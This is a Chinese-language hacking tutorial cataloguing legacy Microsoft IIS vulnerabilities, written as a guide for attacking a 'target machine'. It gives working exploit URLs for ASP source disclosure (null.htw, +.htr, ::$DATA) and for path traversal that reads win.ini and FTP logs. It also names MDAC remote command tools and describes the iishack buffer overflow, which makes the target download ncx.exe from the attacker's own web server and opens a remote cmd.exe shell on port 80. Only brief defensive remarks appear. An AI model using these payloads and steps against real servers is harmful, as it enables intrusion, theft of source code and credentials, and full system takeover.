IIS攻擊匯總經(jīng)典版
本文主要描述的是IIS攻擊大全,介紹的方法主要通過端口80來對其完成操作,其具有很大的威脅性,所以作為網(wǎng)絡服務器80端口總要打開的。假如想方便一些,下載一些WWW、CGI掃描器來輔助檢查。
而且要知道目標機器運行的是何種服務程序,你可以使用以下命令:
telnet 《目標機》 80
GET HEAD / HTTP/1.0
就可以返回一些域名和WEB服務程序版本,如果有些服務器把WEB服務運行在8080,81,8000,8001口,你就TELNET相應的口上。
2.常見漏洞
(1)、Null.htw
IIS如果運行了Index Server就包含了一個通過Null.htw有關的漏洞,即服務器上不存在此.htw結尾的文件。這個漏洞會導致顯示ASP腳本的源代碼, global.asa里面包含了用戶帳戶等敏感信息。如果IIS攻擊者提供特殊的URL請求給IIS就可以跳出虛擬目錄的限制,進行邏輯分區(qū)和ROOT目錄的訪問。而這個"hit-highlighting"功能在Index Server中沒有充分防止各種類型文件的請求,所以導致攻擊者訪問服務器上的任意文件。Null.htw功能可以從用戶輸入中獲得3個變量:
CiWebhitsfile
CiRestriction
CiHiliteType
你可通過下列方法傳遞變量來獲得如default.asp的源代碼:
http://www.目標機.com/null.htw?CiWebhitsfile=/default.asp%20&%20
CiRestriction=none%20&%20&CiHiliteType=full其中不需要一個合法的.htw文件是因為虛擬文件已經(jīng)存儲在內(nèi)存中了。
(2)、MDAC- 執(zhí)行本地命令漏洞
這個漏洞出現(xiàn)得比較早,但在全球范圍內(nèi),可能還有好多IIS WEB服務器存在這個漏洞,就像在今天,還有很多人在用Windows3.2一樣。IIS的MDAC組件存在一個漏洞,可以導致攻擊者遠程執(zhí)行目標系統(tǒng)的命令。主要核心問題是存在于RDSDatafactory,默認情況下,它允許遠程命令發(fā)送到IIS服務器中,這命令會以設備用戶的身份運行,在默認情況下是SYSTEM用戶。我們可以通過以下辦法測試本機是否存在這個漏洞:
c:\》nc -nw -w 2 《目標機》 80
GET /msadc/msadcs.dll HTTP
如果你得到下面的信息:
application/x_varg
就很有可能存在此漏洞且沒有打上補丁,你可以使用rain forest puppy網(wǎng)站的兩個程序進行測(www.wiretrip.net/rfp)==》mdac.pl和msadc2.pl。
(3)、ASP Dot Bug
這個漏洞出現(xiàn)得比較早了,是Lopht小組在1997年發(fā)現(xiàn)的缺陷,這個漏洞也是泄露ASP源代碼給IIS攻擊者,一般在IIS3.0上存在此漏洞,在請求的URL結尾追加一個或者多個點導致泄露ASP源代碼。http://www.目標機.com/sample.asp.
(4)、idc & .ida Bugs
這個漏洞實際上類似ASP dot 漏洞,其能在IIS4.0上顯示其WEB目錄信息,很奇怪有些人還在IIS5.0上發(fā)現(xiàn)過此類漏洞,通過增加?idc?或者?ida?后綴到URL會導致IIS嘗試允許通過數(shù)據(jù)庫連接程序.DLL來運行.IDC,如果此.idc不存在,它就返回一些信息給客戶端。
http://www.目標機.com/anything.idc 或者 anything.idq
(5)、+.htr Bug
這個漏洞是由NSFOCUS發(fā)現(xiàn)的,對有些ASA和ASP追加+.htr的URL請求就會導致文件源代碼的泄露:
http://www.目標機.com/global.asa+.htr
(6)、NT Site Server Adsamples 漏洞
通過請求site.csc,一般保存在/adsamples/config/site.csc中,攻擊者可能獲得一些如數(shù)據(jù)庫中的DSN,UID和PASS的一些信息,如:
http://www.目標機.com/adsamples/config/site.csc#p#
(7)、IIS HACK
有人發(fā)現(xiàn)了一個IIS4.0的緩沖溢出漏洞,可以允許用戶上載程序,如上載netcat到目標服務器,并把cmd.exe綁定到80端口。這個緩沖溢出主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序在系統(tǒng)中下載和執(zhí)行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到站點www.technotronic.com中去下載,另外你還需要一臺自己的WEB服務器,也可以是虛擬服務器哦。你現(xiàn)在你自己的WEB服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:
c:\》iishack.exe 《目標機》 80 《你的WEB服務器》/ncx.exe
然后你就使用netcat來連接你要檢測的服務器:
c:\》nc 《目標機》 80
如果溢出點正確,你就可以看到目標機器的命令行提示,并且是遠程管理權限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附帶的看文件的程序,但不是默認安裝的,這個查看器是在管理員允許查看樣例文件作為聯(lián)系的情況下安裝的。但是,這個查看器并沒有很好地限制所訪問的文件,遠程IIS攻擊者可以利用這個漏洞來查看目標機器上的任意文件內(nèi)容,但要注意以下幾點:
1.Codebrws.asp 和 Showcode.asp默認情況下不安裝。
2.漏洞僅允許查看文件內(nèi)容。
3.這個漏洞不能繞過WINDOWS NT的ACL控制列表的限制。
4.只允許同一分區(qū)下的文件可以被查看(所以把IIS目錄和WINNT分區(qū)安裝是個不錯的方案,這樣也可能比較好的防止最新的IIS5.0的unicode漏洞).
5,攻擊者需要知道請求的文件名。
例如你發(fā)現(xiàn)存在這個文件并符合上面的要求,你可以請求如下的命令:
http://www.目標機.com/iisamples/exair/howitworks/codebrws.asp?source=/
iisamples/exair/howitworks/codebrws.asp
你就可以查看到codebrws.asp的源代碼了。
你也可以使用showcode.asp來查看文件:
http://www.目標機.com/msadc/samples/selector/showcode.asp?
source=/msadc/../../../../../winnt/win.ini
當然你也可以查看一些FTP信息來獲得其他的目標管理員經(jīng)常使用的機器,或許其他的機器的安全性比WEB服務器差,如:
http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp?
source=/msadc/Samples/../../../../../winnt/system32/logfiles/MSFTPSVC1/ex000517.log
(8)、webhits.dll & .htw
這個hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)其原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數(shù)傳遞給.htw時,他們就可以請求任意文件,結果就是導致可以查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個漏洞,你可以請求如下條目:
http://www.目標機.com/nosuchfile.htw
如果你從服務器端獲得如下信息:
format of the QUERY_STRING is invalid
這就表示你存在這個漏洞。
這個問題主要就是webhits.dll關聯(lián)了.htw文件的映射,所以你只要取消這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統(tǒng)中搜索.htw文件,一般會發(fā)現(xiàn)如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)
IIS攻擊者可以使用如下的方法來訪問系統(tǒng)中文件的內(nèi)容:
http://www.目標機.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就會在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。
(9)、ASP Alternate Data Streams(::$DATA)
$DATA這個漏洞是在1998年中期公布的,$DATA是在NTFS文件系統(tǒng)中存儲在文件里面的main data stream屬性,通過建立一個特殊格式的URL,就可能使用IIS在瀏覽器中訪問這個data stream(數(shù)據(jù)流),這樣做也就顯示了文件代碼中這些data stream(數(shù)據(jù)流)和任何文件所包含的數(shù)據(jù)代碼。
其中這個漏洞需要下面的幾個限制,一個是要顯示的這個文件需要保存在NTFS文件分區(qū)(幸好為了"安全"好多服務器設置了NTFS格式),第二是文件需要被ACL設置為全局可讀。而且未授權用戶需要知道要查看文件名的名字,WIN NT中的IIS1.0, 2.0, 3.0和4.0都存在此問題。微軟提供了一個IIS3.0和4.0的版本補丁,
要查看一些.asp文件的內(nèi)容,你可以請求如下的URL:
http://www.目標機.com/default.asp::$DATA 你就得到了源代碼。你要了解下NTFS文件系統(tǒng)中的數(shù)據(jù)流問題,你或許可以看看這文章:
http://focus.silversand.net/newsite/skill/ntfs.txt
(10)、ISM.DLL 緩沖截斷漏洞
這個漏洞存在于IIS4.0和5.0中,允許IIS攻擊者查看任意文件內(nèi)容和源代碼。通過在文件 名后面追加近230個+或者?%20?(這些表示空格)并追加?.htr?的特殊請求給IIS,會使IIS認為客戶端請求的是?.htr?
文件,而.htr文件的后綴映射到ISM.DLL ISAPI應用程序,這樣IIS就把這個.htr請求轉交給這個DLL文件,然后ISM.DLL程序把傳遞過來的文件打開和執(zhí)行,但在ISM.DLL 截斷信息之前,緩沖區(qū)發(fā)送一個斷開的 .Htr 并會延遲一段時間來返回一些你要打開的文件內(nèi)容。可是要注意,除非 WEB 服務停止并重啟過,否則這攻擊只能有效執(zhí)行一次。如果已經(jīng)發(fā)送過一個 .htr 請求到機器上,那么這攻擊會失效.它只能在 ISM.DLL 第一次裝入內(nèi)存時工作。
【編輯推薦】
